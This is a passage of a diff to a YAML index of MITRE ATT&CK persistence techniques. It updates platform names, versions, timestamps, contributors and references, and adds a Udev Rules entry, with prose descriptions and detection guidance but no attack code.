+      modified: '2024-09-16T16:54:47.595Z'
       name: Conditional Access Policies
       description: "Adversaries may disable or modify conditional access policies
         to enable persistent access to compromised accounts. Conditional access policies
         are additional verifications used by identity providers and identity and access
         management systems to determine whether a user should be granted access to
-        a resource.\n\nFor example, in Azure AD, Okta, and JumpCloud, users can be
+        a resource.\n\nFor example, in Entra ID, Okta, and JumpCloud, users can be
         denied access to applications based on their IP address, device enrollment
         status, and use of multi-factor authentication.(Citation: Microsoft Conditional
         Access)(Citation: JumpCloud Conditional Access Policies)(Citation: Okta Conditional
@@ -34271,10 +34668,9 @@ persistence:
       - enterprise-attack
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
-      - Azure AD
-      - SaaS
       - IaaS
-      x_mitre_version: '1.0'
+      - Identity Provider
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Active Directory: Active Directory Object Modification'
       - 'Cloud Service: Cloud Service Modification'
@@ -34311,7 +34707,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1543.001:
     technique:
@@ -34385,7 +34780,7 @@ persistence:
         benign software. Launch Agents are created with user level privileges and
         execute with user level permissions.(Citation: OSX Malware Detection)(Citation:
         OceanLotus for OS X) "
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-21T16:13:00.598Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Create or Modify System Process: Launch Agent'
       x_mitre_detection: "Monitor Launch Agent creation through additional plist files
@@ -34413,12 +34808,11 @@ persistence:
       - User
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1543.001
     atomic_tests: []
   T1505:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-10-19T21:18:29.349Z'
       name: Server Software Component
       description: 'Adversaries may abuse legitimate extensible development features
         of servers to establish persistent access to systems. Enterprise server applications
@@ -34477,33 +34871,10 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1556.001:
     technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--d4b96d2c-1032-4b22-9235-2b5b649d0605
-      type: attack-pattern
-      created: '2020-02-11T19:05:02.399Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1556.001
-        url: https://attack.mitre.org/techniques/T1556/001
-      - source_name: Dell Skeleton
-        description: Dell SecureWorks. (2015, January 12). Skeleton Key Malware Analysis.
-          Retrieved April 8, 2019.
-        url: https://www.secureworks.com/research/skeleton-key-malware-analysis
-      - url: https://technet.microsoft.com/en-us/library/dn487457.aspx
-        description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved
-          June 3, 2016.
-        source_name: TechNet Audit Policy
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-08-21T15:26:54.386Z'
       name: Domain Controller Authentication
       description: "Adversaries may patch the authentication process on a domain controller
         to bypass the typical authentication mechanisms and enable access to accounts.
@@ -34524,6 +34895,7 @@ persistence:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_deprecated: false
       x_mitre_detection: "Monitor for calls to <code>OpenProcess</code> that can be
         used to manipulate lsass.exe running on a domain controller as well as for
         malicious modifications to functions exported from authentication-related
@@ -34538,52 +34910,42 @@ persistence:
         used to execute binaries on a remote system as a particular account. Correlate
         other security systems with login information (e.g. a user has an active login
         session but has not entered the building or does not have VPN access). "
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '2.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '2.1'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'Process: Process Access'
       - 'File: File Modification'
       - 'Process: OS API Execution'
-      x_mitre_permissions_required:
-      - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
-    atomic_tests: []
-  T1556.005:
-    technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--d50955c2-272d-4ac8-95da-10c29dda1c48
       type: attack-pattern
-      created: '2022-01-13T20:02:28.349Z'
+      id: attack-pattern--d4b96d2c-1032-4b22-9235-2b5b649d0605
+      created: '2020-02-11T19:05:02.399Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1556.005
-        url: https://attack.mitre.org/techniques/T1556/005
-      - source_name: store_pwd_rev_enc
-        url: https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/store-passwords-using-reversible-encryption
-        description: Microsoft. (2021, October 28). Store passwords using reversible
-          encryption. Retrieved January 3, 2022.
-      - source_name: how_pwd_rev_enc_1
-        url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible.html
-        description: 'Teusink, N. (2009, August 25). Passwords stored using reversible
-          encryption: how it works (part 1). Retrieved November 17, 2021.'
-      - source_name: how_pwd_rev_enc_2
-        url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible_26.html
-        description: 'Teusink, N. (2009, August 26). Passwords stored using reversible
-          encryption: how it works (part 2). Retrieved November 17, 2021.'
-      - source_name: dump_pwd_dcsync
-        url: https://adsecurity.org/?p=2053
-        description: Metcalf, S. (2015, November 22). Dump Clear-Text Passwords for
-          All Admins in the Domain Using Mimikatz DCSync. Retrieved November 15, 2021.
-      modified: '2022-05-11T14:00:00.188Z'
+        url: https://attack.mitre.org/techniques/T1556/001
+        external_id: T1556.001
+      - source_name: Dell Skeleton
+        description: Dell SecureWorks. (2015, January 12). Skeleton Key Malware Analysis.
+          Retrieved April 8, 2019.
+        url: https://www.secureworks.com/research/skeleton-key-malware-analysis
+      - source_name: TechNet Audit Policy
+        description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved
+          June 3, 2016.
+        url: https://technet.microsoft.com/en-us/library/dn487457.aspx
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
+  T1556.005:
+    technique:
+      modified: '2024-08-26T15:40:31.871Z'
       name: Reversible Encryption
       description: |-
         An adversary may abuse Active Directory authentication encryption properties to gain access to credentials on Windows systems. The <code>AllowReversiblePasswordEncryption</code> property specifies whether reversible password encryption for an account is enabled or disabled. By default this property is disabled (instead storing user credentials as the output of one-way hashing functions) and should not be enabled unless legacy or other software require it.(Citation: store_pwd_rev_enc)
@@ -34605,6 +34967,7 @@ persistence:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_deprecated: false
       x_mitre_detection: "Monitor property changes in Group Policy: <code>Computer
         Configuration\\Windows Settings\\Security Settings\\Account Policies\\Password
         Policy\\Store passwords using reversible encryption</code>. By default, the
@@ -34615,23 +34978,50 @@ persistence:
         Directory PowerShell modules, such as <code>Set-ADUser</code> and <code>Set-ADAccountControl</code>,
         that change account configurations. \n\nMonitor Fine-Grained Password Policies
         and regularly audit user accounts and group settings.(Citation: dump_pwd_dcsync)"
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Active Directory: Active Directory Object Modification'
       - 'Command: Command Execution'
       - 'User Account: User Account Metadata'
       - 'Script: Script Execution'
-      x_mitre_permissions_required:
-      - User
-      - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--d50955c2-272d-4ac8-95da-10c29dda1c48
+      created: '2022-01-13T20:02:28.349Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1556/005
+        external_id: T1556.005
+      - source_name: dump_pwd_dcsync
+        description: Metcalf, S. (2015, November 22). Dump Clear-Text Passwords for
+          All Admins in the Domain Using Mimikatz DCSync. Retrieved November 15, 2021.
+        url: https://adsecurity.org/?p=2053
+      - source_name: store_pwd_rev_enc
+        description: Microsoft. (2021, October 28). Store passwords using reversible
+          encryption. Retrieved January 3, 2022.
+        url: https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/store-passwords-using-reversible-encryption
+      - source_name: how_pwd_rev_enc_1
+        description: 'Teusink, N. (2009, August 25). Passwords stored using reversible
+          encryption: how it works (part 1). Retrieved November 17, 2021.'
+        url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible.html
+      - source_name: how_pwd_rev_enc_2
+        description: 'Teusink, N. (2009, August 26). Passwords stored using reversible
+          encryption: how it works (part 2). Retrieved November 17, 2021.'
+        url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible_26.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1546.016:
     technique:
-      modified: '2024-04-12T02:23:44.583Z'
+      modified: '2024-04-28T15:52:44.332Z'
       name: Installer Packages
       description: |-
         Adversaries may establish persistence and elevate privileges by using an installer to trigger the execution of malicious content. Installer packages are OS specific and contain the resources an operating system needs to install applications on a system. Installer packages can include scripts that run prior to installation as well as after installation is complete. Installer scripts may inherit elevated permissions when executed. Developers often use these scripts to prepare the environment for installation, check requirements, download dependencies, and remove files after installation.(Citation: Installer Package Scripting Rich Trouton)
@@ -34648,7 +35038,7 @@ persistence:
         phase_name: persistence
       x_mitre_contributors:
       - Brandon Dalton @PartyD0lphin
-      - Alexander Rodchenko
+      - Rodchenko Aleksandr
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
@@ -34707,7 +35097,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1037.004:
     technique:
@@ -34789,7 +35178,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1037.004
     atomic_tests: []
   T1543.002:
@@ -34904,12 +35292,11 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1543.002
     atomic_tests: []
   T1136:
     technique:
-      modified: '2024-01-31T20:46:43.215Z'
+      modified: '2024-10-15T15:53:21.895Z'
       name: Create Account
       description: |-
         Adversaries may create an account to maintain access to victim systems.(Citation: Symantec WastedLocker June 2020) With a sufficient level of access, creating such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.
@@ -34932,16 +35319,15 @@ persistence:
       x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Network
       - Containers
       - SaaS
-      x_mitre_version: '2.4'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.5'
       x_mitre_data_sources:
       - 'Process: Process Creation'
       - 'Command: Command Execution'
@@ -34968,7 +35354,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1547.013:
     technique:
@@ -35037,7 +35422,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1547.007:
     technique:
@@ -35073,7 +35457,7 @@ persistence:
         Adversaries may modify plist files to automatically run an application when a user logs in. When a user logs out or restarts via the macOS Graphical User Interface (GUI), a prompt is provided to the user with a checkbox to "Reopen windows when logging back in".(Citation: Re-Open windows on Mac) When selected, all applications currently open are added to a property list file named <code>com.apple.loginwindow.[UUID].plist</code> within the <code>~/Library/Preferences/ByHost</code> directory.(Citation: Methods of Mac Malware Persistence)(Citation: Wardle Persistence Chapter) Applications listed in this file are automatically reopened upon the user’s next logon.
 
         Adversaries can establish [Persistence](https://attack.mitre.org/tactics/TA0003) by adding a malicious application path to the <code>com.apple.loginwindow.[UUID].plist</code> file to execute payloads when a user logs in.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-19T23:46:56.443Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Boot or Logon Autostart Execution: Re-opened Applications'
       x_mitre_detection: Monitoring the specific plist files associated with reopening
@@ -35092,12 +35476,11 @@ persistence:
       - User
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.007
     atomic_tests: []
   T1574.002:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:47.241Z'
       name: 'Hijack Execution Flow: DLL Side-Loading'
       description: |-
         Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
@@ -35147,12 +35530,11 @@ persistence:
         url: https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-dll-sideloading.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
       identifier: T1574.002
     atomic_tests: []
   T1098.002:
     technique:
-      modified: '2024-01-03T15:46:06.706Z'
+      modified: '2024-10-15T15:37:25.303Z'
       name: 'Account Manipulation: Additional Email Delegate Permissions'
       description: "Adversaries may grant additional permission levels to maintain
         persistent access to an adversary-controlled email account. \n\nFor example,
@@ -35185,9 +35567,10 @@ persistence:
       x_mitre_contributors:
       - Microsoft Detection and Response Team (DART)
       - Mike Burns, Mandiant
-      - Naveen Vijayaraghavan, Nilesh Dherange (Gurucul)
       - Jannie Li, Microsoft Threat Intelligence Center (MSTIC)
       - Arad Inbar, Fidelis Security
+      - Nilesh Dherange (Gurucul)
+      - Naveen Vijayaraghavan
       x_mitre_deprecated: false
       x_mitre_detection: "Monitor for unusual Exchange and Office 365 email account
         permissions changes that may indicate excessively broad permissions being
@@ -35204,9 +35587,8 @@ persistence:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Windows
-      - Office 365
-      - Google Workspace
-      x_mitre_version: '2.1'
+      - Office Suite
+      x_mitre_version: '2.2'
       x_mitre_data_sources:
       - 'Group: Group Modification'
       - 'Application Log: Application Log Content'
@@ -35252,12 +35634,11 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1098.002
     atomic_tests: []
   T1653:
     technique:
-      modified: '2023-09-30T21:28:45.038Z'
+      modified: '2024-10-16T20:11:40.334Z'
       name: Power Settings
       description: |-
         Adversaries may impair a system's ability to hibernate, reboot, or shut down in order to extend access to infected machines. When a computer enters a dormant state, some or all software and hardware may cease to operate which can disrupt malicious activity.(Citation: Sleep, shut down, hibernate)
@@ -35271,7 +35652,7 @@ persistence:
       - kill_chain_name: mitre-attack
         phase_name: persistence
       x_mitre_contributors:
-      - Goldstein Menachem
+      - Menachem Goldstein
       - Juan Tapiador
       x_mitre_deprecated: false
       x_mitre_detection: "Command-line invocation of tools capable of modifying services
@@ -35330,7 +35711,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1037.001:
     technique:
@@ -35356,7 +35736,7 @@ persistence:
         url: http://www.hexacorn.com/blog/2014/11/14/beyond-good-ol-run-key-part-18/
         description: Hexacorn. (2014, November 14). Beyond good ol’ Run key, Part
           18. Retrieved November 15, 2019.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-24T23:45:03.153Z'
       name: 'Boot or Logon Initialization Scripts: Logon Script (Windows)'
       description: "Adversaries may use Windows logon scripts automatically executed
         at logon initialization to establish persistence. Windows allows logon scripts
@@ -35382,13 +35762,11 @@ persistence:
       - 'Command: Command Execution'
       - 'Process: Process Creation'
       - 'Windows Registry: Windows Registry Key Creation'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1037.001
     atomic_tests: []
   T1137.002:
     technique:
-      modified: '2024-04-16T12:41:55.175Z'
+      modified: '2024-10-15T16:01:48.325Z'
       name: 'Office Application Startup: Office Test'
       description: |-
         Adversaries may abuse the Microsoft Office "Office Test" Registry key to obtain persistence on a compromised system. An Office Test Registry location exists that allows a user to specify an arbitrary DLL that will be executed every time an Office application is started. This Registry key is thought to be used by Microsoft to load DLLs for testing and debugging purposes while developing Office applications. This Registry key is not created by default during an Office installation.(Citation: Hexacorn Office Test)(Citation: Palo Alto Office Test Sofacy)
@@ -35412,8 +35790,8 @@ persistence:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Windows
-      - Office 365
-      x_mitre_version: '1.2'
+      - Office Suite
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Windows Registry: Windows Registry Key Creation'
       - 'Command: Command Execution'
@@ -35443,7 +35821,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1137.002
     atomic_tests: []
   T1547.008:
@@ -35486,7 +35863,7 @@ persistence:
         Adversaries may modify or add LSASS drivers to obtain persistence on compromised systems. The Windows security subsystem is a set of components that manage and enforce the security policy for a computer or domain. The Local Security Authority (LSA) is the main component responsible for local security policy and user authentication. The LSA includes multiple dynamic link libraries (DLLs) associated with various other security functions, all of which run in the context of the LSA Subsystem Service (LSASS) lsass.exe process.(Citation: Microsoft Security Subsystem)
 
         Adversaries may target LSASS drivers to obtain persistence. By either replacing or adding illegitimate drivers (e.g., [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574)), an adversary can use LSA operations to continuously execute malicious payloads.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-20T16:34:43.405Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Boot or Logon Autostart Execution: LSASS Driver'
       x_mitre_detection: "With LSA Protection enabled, monitor the event logs (Events
@@ -35511,12 +35888,11 @@ persistence:
       - Administrator
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.008
     atomic_tests: []
   T1078.004:
     technique:
-      modified: '2024-03-29T15:42:13.499Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Valid Accounts: Cloud Accounts'
       description: "Valid accounts in cloud environments may allow adversaries to
         perform actions to achieve Initial Access, Persistence, Privilege Escalation,
@@ -35556,8 +35932,10 @@ persistence:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: initial-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Jon Sternstein, Stern Security
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: Monitor the activity of cloud accounts to detect abnormal
         or malicious behavior, such as accessing information outside of the normal
@@ -35565,13 +35943,13 @@ persistence:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
-      - Google Workspace
-      x_mitre_version: '1.7'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.8'
       x_mitre_data_sources:
       - 'User Account: User Account Authentication'
       - 'Logon Session: Logon Session Metadata'
@@ -35602,17 +35980,14 @@ persistence:
         url: https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/deployment/how-to-connect-fed-azure-adfs
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1078.004
     atomic_tests: []
   T1053.002:
     technique:
-      modified: '2023-11-15T14:38:10.876Z'
+      modified: '2024-10-12T15:53:12.333Z'
       name: 'Scheduled Task/Job: At'
       description: |-
-        Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows, Linux, and macOS for scheduling tasks at a specified time and date. Although deprecated in favor of [Scheduled Task](https://attack.mitre.org/techniques/T1053/005)'s [schtasks](https://attack.mitre.org/software/S0111) in Windows environments, using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group.
+        Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows, Linux, and macOS for scheduling tasks at a specified time and date. Although deprecated in favor of [Scheduled Task](https://attack.mitre.org/techniques/T1053/005)'s [schtasks](https://attack.mitre.org/software/S0111) in Windows environments, using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group. In addition to explicitly running the `at` command, adversaries may also schedule a task with [at](https://attack.mitre.org/software/S0110) by directly leveraging the [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) `Win32_ScheduledJob` WMI class.(Citation: Malicious Life by Cybereason)
 
         On Linux and macOS, [at](https://attack.mitre.org/software/S0110) may be invoked by the superuser as well as any users added to the <code>at.allow</code> file. If the <code>at.allow</code> file does not exist, the <code>at.deny</code> file is checked. Every username not listed in <code>at.deny</code> is allowed to invoke [at](https://attack.mitre.org/software/S0110). If the <code>at.deny</code> exists and is empty, global use of [at](https://attack.mitre.org/software/S0110) is permitted. If neither file exists (which is often the baseline) only the superuser is allowed to use [at](https://attack.mitre.org/software/S0110).(Citation: Linux at)
 
@@ -35675,7 +36050,7 @@ persistence:
       - Windows
       - Linux
       - macOS
-      x_mitre_version: '2.2'
+      x_mitre_version: '2.3'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Scheduled Job: Scheduled Job Creation'
@@ -35709,8 +36084,8 @@ persistence:
         url: https://man7.org/linux/man-pages/man1/at.1p.html
       - source_name: Twitter Leoloobeek Scheduled Task
         description: Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved
-          December 12, 2017.
-        url: https://twitter.com/leoloobeek/status/939248813465853953
+          September 12, 2024.
+        url: https://x.com/leoloobeek/status/939248813465853953
       - source_name: Microsoft Scheduled Task Events Win10
         description: Microsoft. (2017, May 28). Audit Other Object Access Events.
           Retrieved June 27, 2019.
@@ -35719,6 +36094,10 @@ persistence:
         description: Microsoft. (n.d.). General Task Registration. Retrieved December
           12, 2017.
         url: https://technet.microsoft.com/library/dd315590.aspx
+      - source_name: Malicious Life by Cybereason
+        description: Philip Tsukerman. (n.d.). No Win32 Process Needed | Expanding
+          the WMI Lateral Movement Arsenal. Retrieved June 19, 2024.
+        url: https://www.cybereason.com/blog/wmi-lateral-movement-win32#blog-subscribe
       - source_name: TechNet Autoruns
         description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
           Retrieved June 6, 2016.
@@ -35731,12 +36110,11 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1053.002
     atomic_tests: []
   T1556:
     technique:
-      modified: '2024-04-11T21:51:44.851Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Modify Authentication Process
       description: |-
         Adversaries may modify authentication mechanisms and processes to access user credentials or enable otherwise unwarranted access to accounts. The authentication process is handled by mechanisms, such as the Local Security Authentication Server (LSASS) process and the Security Accounts Manager (SAM) on Windows, pluggable authentication modules (PAM) on Unix-based systems, and authorization plugins on MacOS systems, responsible for gathering, storing, and validating credentials. By modifying an authentication process, an adversary may be able to authenticate to a service or system without using [Valid Accounts](https://attack.mitre.org/techniques/T1078).
@@ -35749,6 +36127,7 @@ persistence:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Chris Ross @xorrior
       x_mitre_deprecated: false
@@ -35785,17 +36164,17 @@ persistence:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       - Linux
       - macOS
       - Network
-      - Azure AD
-      - Google Workspace
       - IaaS
-      - Office 365
       - SaaS
-      x_mitre_version: '2.4'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.5'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Process: Process Access'
@@ -35841,9 +36220,65 @@ persistence:
         url: https://technet.microsoft.com/en-us/library/dn487457.aspx
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+    atomic_tests: []
+  T1546.017:
+    technique:
+      modified: '2024-11-11T19:05:38.708Z'
+      name: Udev Rules
+      description: |-
+        Adversaries may maintain persistence through executing malicious content triggered using udev rules. Udev is the Linux kernel device manager that dynamically manages device nodes, handles access to pseudo-device files in the `/dev` directory, and responds to hardware events, such as when external devices like hard drives or keyboards are plugged in or removed. Udev uses rule files with `match keys` to specify the conditions a hardware event must meet and `action keys` to define the actions that should follow. Root permissions are required to create, modify, or delete rule files located in `/etc/udev/rules.d/`, `/run/udev/rules.d/`, `/usr/lib/udev/rules.d/`, `/usr/local/lib/udev/rules.d/`, and `/lib/udev/rules.d/`. Rule priority is determined by both directory and by the digit prefix in the rule filename.(Citation: Ignacio Udev research 2024)(Citation: Elastic Linux Persistence 2024)
+
+        Adversaries may abuse the udev subsystem by adding or modifying rules in udev rule files to execute malicious content. For example, an adversary may configure a rule to execute their binary each time the pseudo-device file, such as `/dev/random`, is accessed by an application. Although udev is limited to running short tasks and is restricted by systemd-udevd's sandbox (blocking network and filesystem access), attackers may use scripting commands under the action key `RUN+=` to detach and run the malicious content’s process in the background to bypass these controls.(Citation: Reichert aon sedexp 2024)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: persistence
+      - kill_chain_name: mitre-attack
+        phase_name: privilege-escalation
+      x_mitre_contributors:
+      - Eduardo González Hernández (@codexlynx)
+      - Eder Pérez Ignacio, @ch4ik0
+      - Wirapong Petshagun
+      - "@grahamhelton3"
+      - Ruben Groenewoud, Elastic
+      x_mitre_deprecated: false
+      x_mitre_detection: 'Monitor file creation and modification of Udev rule files
+        in `/etc/udev/rules.d/`, `/lib/udev/rules.d/`, and /usr/lib/udev/rules.d/,
+        specifically the `RUN` action key commands.(Citation: Ignacio Udev research
+        2024) '
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Process: Process Creation'
+      - 'File: File Modification'
+      type: attack-pattern
+      id: attack-pattern--f4c3f644-ab33-433d-8648-75cc03a95792
+      created: '2024-09-26T17:02:09.888Z'
